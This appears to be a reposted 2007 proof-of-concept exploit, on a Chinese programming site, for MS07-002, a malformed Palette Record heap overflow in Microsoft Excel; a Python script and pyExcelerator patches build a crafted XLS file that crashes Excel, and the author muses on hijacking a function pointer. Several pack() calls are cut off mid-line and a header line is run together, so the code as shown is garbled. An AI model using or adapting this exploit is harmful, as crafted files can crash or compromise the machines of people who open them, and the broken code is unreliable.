欢迎来到福编程网,本站提供各种互联网专业知识!

Microsoft Excel Malformed Palette Record DoS PoC (MS07-002)

发布时间:1970-01-01 作者:佚名 来源:互联网
MS07-002EXCELMalformedPaletteRecordVulnerabilityDOSPOC######Author######LifeAsaGeekatgmail.com...andMicrosoftsaidthatvulncreditisforGregMacManusofiDefenseLabs########################Vul
MS07-002 EXCEL Malformed Palette Record Vulnerability DOS POC

######

Author

######

LifeAsaGeek at gmail.com

... and Microsoft said that vuln credit is for Greg MacManus of iDefense Labs

########################

Vulnerablity Description

########################

Bound error occurs when parsing Palette Record and it causes Heap Overflow

check out here - http://picasaweb.google.com/lifeasageek/MS07002/photo?pli=1#5022146178204021506

which is generated by DarunGrim

( and I want to say I'm not a person who made this analyzer ==; )

#############

Attack Vector

#############

Arbitary Data will be overwritten to the heap, but arbitary data is highly depends on the stack status !

Result of heap overflow, you can overwrite 2 bytes to restricted range address ( not anywhere )

In *CERTAIN* environment( such as open excel file which is already opened)

you can catch the flow by modify function pointer, but it doesn't have a reliablity at all

Let me know if you have a good method to break down

######

Result

######

DOS

#####

Notes

#####

You should modify pyExcelerator module because it doesn't generate Palette Record

pyExcelerator diff results would be like below

diff h:studypyexcelerator-0.6.3apyExcelerator-0.6.3abuildlibpyExceleratorBIFFRecords.py pyExceleratorBIFFRecords.py

1104a1105,1108

> def __init__(self):

> BiffRecord.__init__(self)

> self._rec_data = pack('

> self._rec_data = 'A' * 0xe0

diff h:studypyexcelerator-0.6.3apyExcelerator-0.6.3abuildlibpyExceleratorWorkbook.py pyExceleratorWorkbook.py

468,469c468

< result = ''

< return result

---

> return BIFFRecords.PaletteRecord().get()

!! THIS IS ONLY FOR EDUCATIONAL PURPOSE !!

- 2007.01.25

"""

import sys, os

from struct import *

from pyExcelerator import *

def CreateXLS():

w = Workbook()

ws = w.add_sheet('MS07-002 POC')

w.save( "before.xls")

def ModifyXLS():

try:

f = open( "before.xls", "rb")

except:

print "File Open Error ! "

sys.exit(0)

str = f.read()

f.close()

#write to malformed xls file

f = open( "after.xls", "wb")

PaletteRecord = pack( "

NewPaletteRecord = pack( "

palette_idx = str.find( PaletteRecord)

if palette_idx == -1:

print "Cannot find Palette Record"

sys.exit(0)

str = str.replace( PaletteRecord, NewPaletteRecord)

f.write( str)

f.close()

if __name__ == "__main__":

print "==========================================================="

print "MS07-002 Malformed Palette Record vulnerability DOS POC "

print "Create POC Excel File after.xls"

print "by LifeAsaGeek at gmail.com"

print "==========================================================="

CreateXLS()

ModifyXLS()

//http://www.leftworld.net

相关推荐